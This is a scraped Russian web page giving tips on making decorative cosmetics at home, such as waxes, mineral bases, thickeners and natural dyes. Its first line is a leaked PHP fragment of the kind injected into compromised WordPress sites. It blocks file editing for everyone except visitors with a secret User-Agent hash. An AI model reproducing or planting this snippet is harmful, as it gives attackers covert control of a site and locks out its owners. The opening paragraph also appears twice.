if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Секреты домашней декоративной косметики или из чего ее сделать своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Секреты домашней декоративной косметики или из чего ее сделать своими руками

Любая девушка в ежедневной жизни прибегает к использованию декоративной косметики, но в последнее время идти за ней в магазин стало не так уж и безопасно. Это объясняется тем, что сегодня довольно часто вместо качественной косметики на прилавки магазинов стали попадать ее подделки, которые могут только навредить вашей коже.

Любая девуш­ка в еже­днев­ной жиз­ни при­бе­га­ет к исполь­зо­ва­нию деко­ра­тив­ной кос­ме­ти­ки, но в послед­нее вре­мя идти за ней в мага­зин ста­ло не так уж и без­опас­но. Это объ­яс­ня­ет­ся тем, что сего­дня доволь­но часто вме­сто каче­ствен­ной кос­ме­ти­ки на при­лав­ки мага­зи­нов ста­ли попа­дать ее под­дел­ки, кото­рые могут толь­ко навре­дить вашей коже.

Поэто­му сего­дня нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми все чаще ста­ла появ­лять­ся в кос­ме­тич­ках совре­мен­ных жен­щин. А сде­лать ее мож­но, сле­дуя инструк­ции и исполь­зуя спе­ци­аль­ные про­дук­ты, кото­рые мож­но при­об­ре­сти в интернет-магазине.

Цветочные воски

Отлич­но под­хо­дят для изго­тов­ле­ния баль­за­мов для губ, жид­ких теней. Жид­кие или твер­дые, вос­ки хоро­шо пита­ют и зажив­ля­ют кожу, а так­же обла­да­ют при­ят­ным стой­ким ароматом.

Минеральные базы

Осно­ва для созда­ния тональ­но­го кре­ма или пуд­ры, пред­став­лен­ная в раз­ных цве­тах и обла­да­ю­щая раз­ны­ми свой­ства­ми. При созда­нии опре­де­лен­но­го тона мине­раль­ная база долж­на быть немно­го свет­лее его.

Загустители

Обыч­но исполь­зу­ет­ся при изго­тов­ле­нии теней или тональ­но­го кре­ма. Из все­го мно­го­об­ра­зия видов загу­сти­те­лей чаще все­го выби­ра­ют ксантан.

Натуральные красители

Спе­ци­аль­ные ингре­ди­ен­ты, полу­чен­ные из нату­раль­ных про­дук­тов, кото­рые при­да­дут домаш­ней деко­ра­тив­ной кос­ме­ти­ке насы­щен­ный цвет. Хоть раз­но­об­ра­зие цве­тов нату­раль­ных кра­си­те­лей не такое, как у искус­ствен­ных, зато вы буде­те уве­ре­ны, что ваша бес­плат­ная кос­ме­ти­ка пол­но­стью безопасна.

Косметические аромамасла

Нату­раль­ные ком­по­нен­ты для аро­ма­ти­за­ции деко­ра­тив­ной кос­ме­ти­ки. Толь­ко нуж­но раз­ли­чать кос­ме­ти­че­ские и аптеч­ные мас­ла – послед­ние доста­точ­но едки и грубы.

Для при­го­тов­ле­ния кос­ме­ти­ки вам потре­бу­ет­ся хоро­шо про­сте­ри­ли­зо­ван­ные посу­да и палоч­ки, мини-мик­сер, емко­сти для хра­не­ния кос­ме­ти­ки, полос­ки-инди­ка­то­ры для изме­ре­ния кис­лот­но­сти. И тогда кос­ме­ти­ка в домаш­них усло­ви­ях пой­дет толь­ко на поль­зу вашей коже.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!